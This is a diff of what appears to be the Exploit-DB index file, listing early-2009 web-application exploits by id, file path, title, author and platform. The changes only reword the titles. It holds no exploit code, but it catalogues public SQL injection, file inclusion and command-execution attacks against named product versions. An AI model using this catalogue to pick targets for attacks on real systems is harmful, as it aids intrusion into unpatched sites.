-7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection",2009-01-20,snakespc,php,webapps,0 +7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' SQL Injection",2009-01-20,snakespc,php,webapps,0 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution",2009-01-20,Osirys,php,webapps,0 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - Local File Inclusion",2009-01-20,Stack,php,webapps,0 7840,platforms/php/webapps/7840.pl,"Joomla! Component Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0 7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps,0 -7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - passwd.dat Disclosure",2009-01-21,Pouya_Server,php,webapps,0 +7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - 'passwd.dat' File Disclosure",2009-01-21,Pouya_Server,php,webapps,0 7846,platforms/php/webapps/7846.php,"Joomla! Component com_pcchess - Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps,0 7847,platforms/php/webapps/7847.txt,"Joomla! Component beamospetition 1.0.12 - SQL Injection / Cross-Site Scripting",2009-01-21,vds_s,php,webapps,0 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - 'autor.php' SQL Injection",2009-01-22,nuclear,php,webapps,0 @@ -21294,25 +21295,25 @@ id,file,description,date,author,platform,type,port 7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0 7860,platforms/php/webapps/7860.php,"Mambo Component com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,asp,webapps,0 -7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' Parameter SQL Injection",2009-01-25,JIKO,php,webapps,0 +7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - Local File Inclusion",2009-01-25,fuzion,php,webapps,0 7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - 'Password.dat' Disclosure",2009-01-25,Pouya_Server,php,webapps,0 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - Blind SQL Injection",2009-01-26,fuzion,php,webapps,0 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 -7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' Parameter SQL Injection",2009-01-26,FeDeReR,php,webapps,0 +7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 -7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - 'userid' Parameter SQL Injection",2009-01-26,nuclear,php,webapps,0 +7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - 'userid' SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 7879,platforms/php/webapps/7879.pl,"SiteXS CMS 0.1.1 - Local File Inclusion",2009-01-26,darkjoker,php,webapps,0 7880,platforms/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps,0 7881,platforms/php/webapps/7881.txt,"Joomla! Component ElearningForce Flash Magazine Deluxe - SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 -7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - 'MAX_type' Parameter Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 +7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - 'MAX_type' Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0 7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - 'show_post.php' SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 -7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion",2009-01-27,DSecRG,php,webapps,0 -7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - 'id' Parameter Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 +7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusions",2009-01-27,DSecRG,php,webapps,0 +7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - 'id' Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS 1.0 - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0 @@ -21320,7 +21321,7 @@ id,file,description,date,author,platform,type,port 7897,platforms/php/webapps/7897.php,"phpList 2.10.x - Remote Code Execution / Local File Inclusion",2009-01-28,mozi,php,webapps,0 7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - 'submit_post.php' SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 -7900,platforms/php/webapps/7900.txt,"Social Engine 3.06 - 'category_id' Parameter SQL Injection",2009-01-28,snakespc,php,webapps,0 +7900,platforms/php/webapps/7900.txt,"Social Engine 3.06 - 'category_id' SQL Injection",2009-01-28,snakespc,php,webapps,0 7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - Blind SQL Injection",2009-01-28,certaindeath,php,webapps,0 7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 @@ -21356,7 +21357,7 @@ id,file,description,date,author,platform,type,port 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,php,webapps,0 7959,platforms/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps,0 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0 -7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Parameter Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 +7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0 7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0 7965,platforms/php/webapps/7965.txt,"Technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 @@ -21364,14 +21365,14 @@ id,file,description,date,author,platform,type,port 7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0 7972,platforms/php/webapps/7972.py,"OpenFiler 2.3 - (Authentication Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 -7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusion",2009-02-04,fuzion,php,webapps,0 -7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - 'synTarget' Parameter Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 +7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusions",2009-02-04,fuzion,php,webapps,0 +7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - 'synTarget' Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 -7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusion",2009-02-04,make0day,php,webapps,0 +7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusions",2009-02-04,make0day,php,webapps,0 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 -7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Parameter Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 +7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0 @@ -21382,28 +21383,28 @@ id,file,description,date,author,platform,type,port 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0 -8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 +8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution / Remote File Inclusion",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0 -8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 +8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0 -8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Parameter Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 +8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 -8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' Parameter SQL Injection",2009-02-09,K-159,php,webapps,0 -8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection",2009-02-09,BackDoor,php,webapps,0 +8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0 +8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0 8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 -8018,platforms/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' Parameter SQL Injection",2009-02-09,MisterRichard,php,webapps,0 +8018,platforms/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' SQL Injection",2009-02-09,MisterRichard,php,webapps,0 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps,0 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0 -8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0 +8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusions",2009-02-09,ahmadbady,php,webapps,0 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0 -8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Parameter Local File Inclusion",2009-02-10,cheverok,php,webapps,0 -8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion",2009-02-10,SirGod,php,webapps,0 +8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Local File Inclusion",2009-02-10,cheverok,php,webapps,0 +8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Local File Inclusion",2009-02-10,SirGod,php,webapps,0 8031,platforms/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0 8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,php,webapps,0 8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0 @@ -21414,30 +21415,30 @@ id,file,description,date,author,platform,type,port 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0 8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps,0 -8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection",2009-02-11,Osirys,php,webapps,0 -8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection",2009-02-11,nuclear,php,webapps,0 -8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' Parameter SQL Injection",2009-02-11,Osirys,php,webapps,0 -8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection",2009-02-12,x0r,php,webapps,0 +8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'id' SQL Injection",2009-02-11,Osirys,php,webapps,0 +8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'txtlookgender' SQL Injection",2009-02-11,nuclear,php,webapps,0 +8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' SQL Injection",2009-02-11,Osirys,php,webapps,0 +8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary '.ASP' File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0 -8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' Parameter SQL Injection",2009-02-13,JIKO,php,webapps,0 +8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion",2009-02-13,bd0rk,php,webapps,0 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0 -8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' Parameter SQL Injection",2009-02-13,Osirys,php,webapps,0 +8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' SQL Injection",2009-02-13,Osirys,php,webapps,0 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,php,webapps,0 8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps,0 8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 -8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'id' Parameter SQL Injection",2009-02-16,Darkb0x,asp,webapps,0 +8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'id' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0 8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0 -8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' Parameter SQL Injection",2009-02-17,x0r,php,webapps,0 +8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' SQL Injection",2009-02-17,x0r,php,webapps,0 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0 8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0 8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 @@ -21451,10 +21452,10 @@ id,file,description,date,author,platform,type,port 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 -8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - 'jobid' Parameter SQL Injection",2009-02-23,K-159,php,webapps,0 +8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - 'jobid' SQL Injection",2009-02-23,K-159,php,webapps,0 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0 -8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' Parameter SQL Injection",2009-02-24,b3,php,webapps,0 +8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0 8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 @@ -21474,14 +21475,14 @@ id,file,description,date,author,platform,type,port 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 8132,platforms/asp/webapps/8132.txt,"Access2asp - 'imageLibrar' Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,php,webapps,0 -8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 +8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps,0 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0 8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0 8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0 -8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 +8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0 @@ -21495,12 +21496,12 @@ id,file,description,date,author,platform,type,port 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting",2009-03-09,"Salvatore Fresta",php,webapps,0 -8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - 'bookid' Parameter SQL Injection",2009-03-09,elusiven,php,webapps,0 +8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - 'bookid' SQL Injection",2009-03-09,elusiven,php,webapps,0 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0 -8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - 'course_id' Parameter SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 -8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion",2009-03-10,K-159,php,webapps,0 +8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - 'course_id' SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 +8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusions",2009-03-10,K-159,php,webapps,0 8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0 -8197,platforms/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Permanent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0 +8197,platforms/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Persistent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0 8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",php,webapps,0 8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - 'cookie' Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - Cross-Site Scripting / SQL Injection",2009-03-12,XaDoS,php,webapps,0 @@ -21509,15 +21510,15 @@ id,file,description,date,author,platform,type,port 8210,platforms/php/webapps/8210.txt,"UBBCentral UBB.Threads 5.5.1 - 'message' SQL Injection",2009-03-16,s4squatch,php,webapps,0 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,php,webapps,0 8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,php,webapps,0 -8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - 'entry_id' Parameter SQL Injection",2009-03-16,boom3rang,php,webapps,0 +8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - 'entry_id' SQL Injection",2009-03-16,boom3rang,php,webapps,0 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0 -8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion",2009-03-17,Garry,php,webapps,0 +8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Remote File Inclusion",2009-03-17,Garry,php,webapps,0 8237,platforms/php/webapps/8237.txt,"Facil-CMS 0.1RC2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 -8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0 +8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' 